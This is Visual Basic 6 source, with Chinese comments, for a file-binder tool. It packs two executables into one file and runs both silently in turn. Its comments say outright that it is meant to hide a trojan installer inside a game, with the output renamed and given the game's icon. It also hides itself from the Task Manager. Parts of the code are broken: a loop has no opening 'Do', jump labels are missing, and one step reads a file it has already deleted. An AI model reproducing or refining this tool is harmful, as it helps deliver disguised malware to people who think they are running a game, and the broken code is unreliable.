'这个程序的使用方法 如:DAN pro1.exe ie.exe
'就会生成一个 dan_2.exe
'实例: DAN hehehe.exe game.exe
'hehehe.exe 是你的木马安装程序
'game.exe 是游戏或是安装程序
'再把dan_2.exe 换上game.exe 的图标,改名成 game.exe
'dangerous.bas 无窗口程序。
Private Declare Function OpenProcess Lib "Kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "Kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Sub Sleep Lib "Kernel32" (ByVal dwMilliseconds As Long)
Sub Shell32Bit(ByVal JobToDo As String) '运行一个程序直到它结束
Dim hProcess As Long
Dim RetVal As Long
hProcess = OpenProcess(&H400, False, Shell(JobToDo, 1))
GetExitCodeProcess hProcess, RetVal
DoEvents: Sleep 100
Loop While RetVal = &H103
End Sub
Sub Main()
On Error Resume Next
Dim tCom As String
Dim tTag As Long
Dim Add1 As Long
Dim long1 As Long
Dim Add2 As Long
Dim long2 As Long
tTag = &H76543210 '古怪的几乎不可能出现在文件结尾的值,来判断是否连接过
Dim n As Long
Dim pict() As Byte
App.TaskVisible = False '不显示在任务管理器
ddd = App.Path
If Right(ddd, 1) <> "\" Then ddd = ddd & "\"
tCom = Command()
file1 = PickWord(tCom) '命令行输入的第一个参数
file2 = PickWord(tCom) '命令行输入的第二个参数
tfile = ddd & App.EXEName & ".exe"
tfile2 = ddd & App.EXEName & "_2" & ".exe"
FileCopy tfile, tfile2 '复制一个临时的文件
code = FreeFile(1)
Open tfile2 For Binary As code
Seek code, FileLen(tfile2) - 19 '读出最后20个字节纪录的信息
Get code, , Add1 '文件一地址
Get code, , long1 '文件一尺寸
Get code, , Add2 '文件二地址
Get code, , long2 '文件二尺寸
Get code, , n '是否处理过的标志
If n = tTag Then '如果是一个处理过的文件
file1 = ddd & App.EXEName & "_2a" & ".exe"
file2 = ddd & App.EXEName & "_2b" & ".exe"
ReDim pict(long1 - 1)
Seek code, Add1
Get code, , pict
code2 = FreeFile(1)
Open file1 For Binary As code2
Put code2, , pict
Close code2
Shell32Bit file1 '执行文件1
Kill file1 '删除文件1
ReDim pict(long2 - 1)
Seek code, Add2
Get code, , pict
code2 = FreeFile(1)
Open file2 For Binary As code2
Put code2, , pict
Close code2
Shell32Bit file2 '执行文件2
Kill file2 '删除文件2
Seek code, 1 + FileLen(tfile2)
code2 = FreeFile(1)
Open file1 For Binary As code2
ReDim pict(FileLen(file1) - 1)
Get code2, , pict
Put code, , pict
Close code2
If Err.Number <> 0 Then GoTo errNofile
Seek code, 1 + FileLen(tfile2) + FileLen(file1)
code2 = FreeFile(1)
Open file2 For Binary As code2
ReDim pict(FileLen(file2) - 1)
Get code2, , pict
Put code, , pict
Close code2
If Err.Number <> 0 Then GoTo errNofile
Seek code, 1 + FileLen(tfile2) + FileLen(file1) + FileLen(file2)
Add1 = 1 + FileLen(tfile2)
long1 = FileLen(file1)
Add2 = 1 + FileLen(tfile2) + FileLen(file1)
long2 = FileLen(file2)
Put code, , Add1
Put code, , long1
Put code, , Add2
Put code, , long2
Put code, , tTag
End If
Close code
If n = tTag Then Kill tfile2 '执行完毕删除临时文件
errNofile: '缺少连接文件
Close code '关闭临时文件
Kill tfile2 '删除临时文件
MsgBox " 找不到文件。" & Chr(13) _
& Chr(13) _
& " 使用方法:" & Chr(13) _
& "APPname File1name File2name " & Chr(13) _
& " APPname: 本程序文件名" & Chr(13) _
& "File1name: 连接的第一个文件" & Chr(13) _
& "File2name: 连接的第二个文件" _
, vbOKOnly, "错误"
End Sub
Public Function PickWord(strs As String) As String '挨个取出字符串中的单词
For a = 1 To Len(strs)
If Mid(strs, a, 1) <> " " Then ss = a: GoTo 100
Next a
PickWord = "": Exit Function
For a = ss To Len(strs)
If Mid(strs, a, 1) = " " Then ee = a: GoTo 200
Next a
ee = a
PickWord = Mid(strs, ss, ee - ss)
strs = Mid(strs, ee + 1)
End Function